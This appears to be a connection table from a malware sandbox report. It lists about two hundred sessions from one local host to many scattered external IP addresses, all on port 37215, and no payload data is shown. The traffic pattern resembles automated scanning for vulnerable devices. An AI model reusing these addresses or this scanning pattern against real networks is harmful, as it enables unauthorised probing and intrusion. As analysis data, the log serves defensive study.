                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11244192.168.2.13472589.215.148.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11245192.168.2.1348546197.168.60.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11246192.168.2.133510477.46.52.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11247192.168.2.1353822157.111.113.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11248192.168.2.1347134157.17.35.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11249192.168.2.1342324197.86.19.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11250192.168.2.135610241.204.30.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11251192.168.2.1351112157.148.15.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11252192.168.2.1356582197.198.67.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11253192.168.2.1334902137.235.230.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11254192.168.2.1342264151.42.230.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11255192.168.2.1342860157.175.83.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11256192.168.2.1335482157.125.206.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11257192.168.2.1347510151.88.35.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11258192.168.2.1350900197.170.104.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11259192.168.2.1336978197.200.130.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11260192.168.2.1360866147.135.193.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11261192.168.2.1352520134.150.67.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11262192.168.2.1344354157.63.50.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11263192.168.2.1350144197.220.26.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11264192.168.2.1360274135.198.50.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11265192.168.2.134534841.217.34.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11266192.168.2.1358516152.143.116.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11267192.168.2.134464241.99.3.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11268192.168.2.13603101.26.65.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11269192.168.2.1360934197.43.193.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11270192.168.2.135964241.60.217.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11271192.168.2.1353474157.73.51.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11272192.168.2.134904041.127.28.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11273192.168.2.1333664197.206.26.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11274192.168.2.135090041.182.44.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11275192.168.2.1333456197.137.20.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11276192.168.2.1338166197.111.214.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11277192.168.2.133634241.170.211.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11278192.168.2.1344770157.5.52.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11279192.168.2.1334964197.173.135.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11280192.168.2.1357282162.200.74.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11281192.168.2.134979461.156.77.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11282192.168.2.1349848197.40.124.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11283192.168.2.135703641.198.143.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11284192.168.2.1354930157.14.165.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11285192.168.2.133546841.1.81.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11286192.168.2.1356370197.65.61.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11287192.168.2.1350628157.185.60.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11288192.168.2.1351024197.104.121.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11289192.168.2.134667241.244.138.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11290192.168.2.1333772168.114.139.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11291192.168.2.135076641.112.169.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11292192.168.2.1350212197.79.137.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11293192.168.2.1340100157.25.220.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11294192.168.2.1345250114.110.45.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11295192.168.2.134692041.146.197.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11296192.168.2.1360232197.77.190.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11297192.168.2.133289883.126.152.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11298192.168.2.1337658197.171.159.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11299192.168.2.1357250109.195.92.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11300192.168.2.1333614135.47.223.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11301192.168.2.1338144197.23.182.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11302192.168.2.1344320113.64.163.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11303192.168.2.1359374157.179.90.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11304192.168.2.1334364174.54.38.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11305192.168.2.1348528197.181.235.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11306192.168.2.1341834157.207.54.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11307192.168.2.1360412197.252.108.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11308192.168.2.133887641.119.235.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11309192.168.2.1346456147.217.163.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11310192.168.2.134346641.210.30.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11311192.168.2.135864818.55.162.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11312192.168.2.134438641.143.185.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11313192.168.2.136091884.215.44.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11314192.168.2.1344078157.208.54.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11315192.168.2.134030041.171.35.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11316192.168.2.134989641.102.252.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11317192.168.2.1354198115.93.36.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11318192.168.2.1340544202.113.97.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11319192.168.2.1345250197.221.231.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11320192.168.2.1341876157.125.126.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11321192.168.2.134331441.181.105.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11322192.168.2.1349156197.71.66.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11323192.168.2.135297241.84.128.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11324192.168.2.1360850173.24.103.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11325192.168.2.134735241.209.238.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11326192.168.2.135466241.133.157.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11327192.168.2.1356900197.189.217.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11328192.168.2.1348722157.172.146.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11329192.168.2.134122641.190.80.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11330192.168.2.1358500197.250.234.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11331192.168.2.1359296157.214.28.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11332192.168.2.1353018197.93.72.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11333192.168.2.1336896197.230.230.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11334192.168.2.1352336220.96.0.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11335192.168.2.1346316157.205.59.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11336192.168.2.135080875.70.13.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11337192.168.2.1336624157.14.218.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11338192.168.2.135400041.171.79.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11339192.168.2.134776641.201.41.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11340192.168.2.133290441.239.233.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11341192.168.2.1355392195.121.4.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11342192.168.2.1336560197.33.132.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11343192.168.2.1334852157.230.97.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11344192.168.2.1357026157.14.184.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11345192.168.2.1347826197.102.162.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11346192.168.2.133786441.186.182.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11347192.168.2.1347364197.83.243.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11348192.168.2.1345632157.198.208.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11349192.168.2.1334674193.63.177.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11350192.168.2.134114241.237.149.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11351192.168.2.134351441.188.47.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11352192.168.2.1342218197.169.97.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11353192.168.2.136087041.35.147.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11354192.168.2.135020841.117.32.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11355192.168.2.135662041.114.29.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11356192.168.2.1349572202.39.166.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11357192.168.2.1358938197.251.241.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11358192.168.2.1335126197.50.191.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11359192.168.2.133377441.141.178.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11360192.168.2.1353620197.230.160.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11361192.168.2.134976441.133.112.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11362192.168.2.1341842157.199.196.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11363192.168.2.134405036.210.69.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11364192.168.2.1347808157.26.243.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11365192.168.2.1357126157.88.113.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11366192.168.2.1357312157.87.211.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11367192.168.2.1345440197.28.46.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11368192.168.2.135849096.133.48.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11369192.168.2.1338322157.41.127.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11370192.168.2.134528041.75.58.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11371192.168.2.135175027.94.233.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11372192.168.2.1356904157.103.176.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11373192.168.2.1344598197.53.5.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11374192.168.2.1340562197.102.123.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11375192.168.2.1344118197.7.112.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11376192.168.2.1355814197.213.169.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11377192.168.2.1332956157.104.29.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11378192.168.2.1341956157.168.152.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11379192.168.2.1356310157.213.200.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11380192.168.2.1336630197.143.160.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11381192.168.2.1339580111.163.104.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11382192.168.2.1357568185.193.18.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11383192.168.2.133638041.235.104.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11384192.168.2.1333026183.57.57.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11385192.168.2.1353446157.62.192.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11386192.168.2.133598041.153.233.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11387192.168.2.1351632157.109.205.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11388192.168.2.1349410157.177.69.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11389192.168.2.1358810197.12.105.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11390192.168.2.1359368157.35.20.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11391192.168.2.1339936157.144.224.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11392192.168.2.1355610157.173.49.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11393192.168.2.1360370197.191.115.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11394192.168.2.1333150157.92.185.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11395192.168.2.1348068157.137.43.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11396192.168.2.135400859.247.159.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11397192.168.2.134810241.188.59.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11398192.168.2.134521241.211.91.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11399192.168.2.1355538157.150.210.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11400192.168.2.1351936157.113.243.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11401192.168.2.134058471.250.253.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11402192.168.2.1360556183.84.41.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11403192.168.2.133391274.60.74.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11404192.168.2.1360798197.95.53.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11405192.168.2.135289241.86.76.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11406192.168.2.1343572105.107.156.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11407192.168.2.136075235.151.77.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11408192.168.2.1346476197.222.89.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11409192.168.2.1348704157.133.101.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11410192.168.2.1342084157.20.192.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11411192.168.2.1354526107.49.90.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11412192.168.2.1344114157.29.228.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11413192.168.2.1344096197.193.103.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11414192.168.2.1344104197.196.175.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11415192.168.2.1338308197.250.2.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11416192.168.2.134595041.176.183.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11417192.168.2.1352954190.22.89.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11418192.168.2.1356556197.12.171.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11419192.168.2.1337368177.138.247.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11420192.168.2.135488841.156.231.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11421192.168.2.135410041.110.180.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11422192.168.2.1347226197.88.205.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11423192.168.2.1339052197.240.152.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11424192.168.2.1337458197.178.96.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11425192.168.2.1335858135.156.2.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11426192.168.2.1347018157.156.134.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11427192.168.2.133755241.50.61.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11428192.168.2.1338268197.42.117.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11429192.168.2.133504841.105.91.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11430192.168.2.1337284197.227.139.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11431192.168.2.133755231.113.166.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11432192.168.2.1354820201.151.33.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11433192.168.2.1336008208.125.107.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11434192.168.2.133744041.237.107.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11435192.168.2.135494841.68.236.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11436192.168.2.1334728157.101.151.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11437192.168.2.135566679.38.30.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11438192.168.2.1359646199.212.71.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11439192.168.2.1355412157.220.115.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11440192.168.2.1351032197.128.191.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11441192.168.2.1358844197.145.199.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11442192.168.2.1345026157.11.205.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11443192.168.2.134957841.12.0.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11444192.168.2.1333108157.46.28.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11445192.168.2.1345412133.167.194.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11446192.168.2.1349398157.139.146.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11447192.168.2.134204418.95.176.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11448192.168.2.135540482.71.230.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11449192.168.2.1343292157.216.154.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11450192.168.2.134896641.160.162.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11451192.168.2.133897841.9.137.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11452192.168.2.1348946197.25.39.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
